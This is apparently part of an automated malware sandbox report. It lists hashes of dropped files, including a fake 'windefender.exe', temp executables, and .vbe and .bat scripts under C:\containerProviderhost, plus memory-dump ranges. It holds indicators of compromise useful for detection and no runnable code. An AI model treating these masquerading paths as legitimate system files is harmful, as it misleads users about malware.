SHA512 ce93ba5cdc766acf9d1aa517e63e0477af9ecc743b72a098f5e00668d5f92ab59fff031224d6c176359b06885d22bb10339c613accdd435ffc76b78abe9f3e9f

C:\Windows\windefender.exe

MD5 d52a110e8a644ad42e0d39987f44104c
SHA1 902cc386d545ed58a7f64203d7ab21f2dbe6c210
SHA256 f578866815f89accb31570f45c894052511294bb38ef813bcd32e4ec24e653af
SHA512 d194af10513ee157f7fd23c2a23c030b11a9aefc09ed90e0f011a3df66c107859ea8b016b0c26b0db2881d6f7e0e470d3e146c2b0dc32636748979894120947e

C:\Windows\windefender.exe

MD5 06a3afb990a7d4ed8d740fa739415939
SHA1 c543f51909015a789bf199f4beb9285a37c04eec
SHA256 62d8e9ed58e04749e3e234b807dfef245debdfc6242589b97cd5371c6d2b3562
SHA512 f58cb43b92dfe4469abda5d07b7e4f305ead4f40664029a98c5cd03d1959d465e15d9a23e5d31e0bafc2ebdfda6096c7d2083258fce47fa90612db6105e8f0f2

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/2876-411-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\611E.exe

MD5 20de31c5226fde5ddae74894f2e3f618
SHA1 03b514401eb1c179f4eec5211f646148de8b0426
SHA256 6d5060a8430247a2500bd235d4588710f5ae1c3f8fa48b146914c672f8cc394a
SHA512 aa43a6436aa1dd518f36281b83e25f09d52e72d2f9df316eda8f32ec11296272acfa257c1d37b5a46a72b047fb14f1a25637e5923de7aa30240be78e888a5039

C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe

MD5 49ca6dc4705e383d4162260db0d5bf84
SHA1 b6e1e8f086245aa07a5c2d352e69a9a2fa5c460d
SHA256 6fe6c22a6b3c1de777b489d553073631d8c7e2b76738b9700198876521ff7ba4
SHA512 684c61fba0a98723a41504bc1e7ce4debe0a785a0eb78f13e1cb291d77aa95aa4e82a80166060be8319a35785f6f710dbbaabf710545c4b9556440477b1bde7f

memory/5700-428-0x00007FF795150000-0x00007FF795DB2000-memory.dmp

memory/4528-429-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/2804-441-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4760-448-0x0000000000400000-0x0000000000449000-memory.dmp

memory/4760-452-0x0000000000400000-0x0000000000449000-memory.dmp

C:\containerProviderhost\SSJnjC24t.bat

MD5 08387ad767f4e9e7c670d0eeafe302ef
SHA1 4ba6af1e421c43ee693b6537a06639c3f50a7abf
SHA256 2bdca7aa3916a7a0bb6e1b22d895b9696f14c1512554a7af00d5dbc048e43672
SHA512 94f7743519a768d233130ba4d2b3ccf62f67f0999382cc984051fe5f8ae02deb17926e01482d1e763447d3f54fb3b548ee241d7a40cf34d45d7e968ce8f6975f

C:\containerProviderhost\runtimenetSvc.exe

MD5 92bf2463d72a410bf291db2bbb0176f5
SHA1 bcc41c9861ce8ad99e2d951c49c50429b4dc8d7f
SHA256 92883022e82b89d32c6936ad8f94a35ac1eb0c2313656029977aec1b4973b808
SHA512 c803d47482aec6ac9c74ee20b401f03f3f2d4a1cc80770e1cf70319cbb7da715ee204cb15e585dbd6d9df0d9fb81254fdb6f6dae5d2147cbbbd85c3cf5b8d300

memory/5700-468-0x00007FF795150000-0x00007FF795DB2000-memory.dmp

memory/4528-469-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/4036-556-0x000000001D920000-0x000000001D9ED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FSRA6W5YHr.bat

MD5 f729ebef6ff1fe529297eaa249e6de7a
SHA1 44b6c28705981eebdce8fcd7ba51d9413b2e4fbe
SHA256 9ef5b5fb4391d4125e926d464e664783fa7e283bf293e2c42d812c9d5e56e4bd
SHA512 6f27be6fb0f348d38b1c673a84e4ff6b276d2f71095aef1f45ae73924ddf905040a1861947756714d0bb191e3d54f4ce8de6ad5aed3899dc94843eee0536322b

memory/5700-563-0x00007FF795150000-0x00007FF795DB2000-memory.dmp

memory/4528-564-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/3352-570-0x0000000000400000-0x000000000046D000-memory.dmp

memory/3352-573-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2804-583-0x0000000000400000-0x00000000008DF000-memory.dmp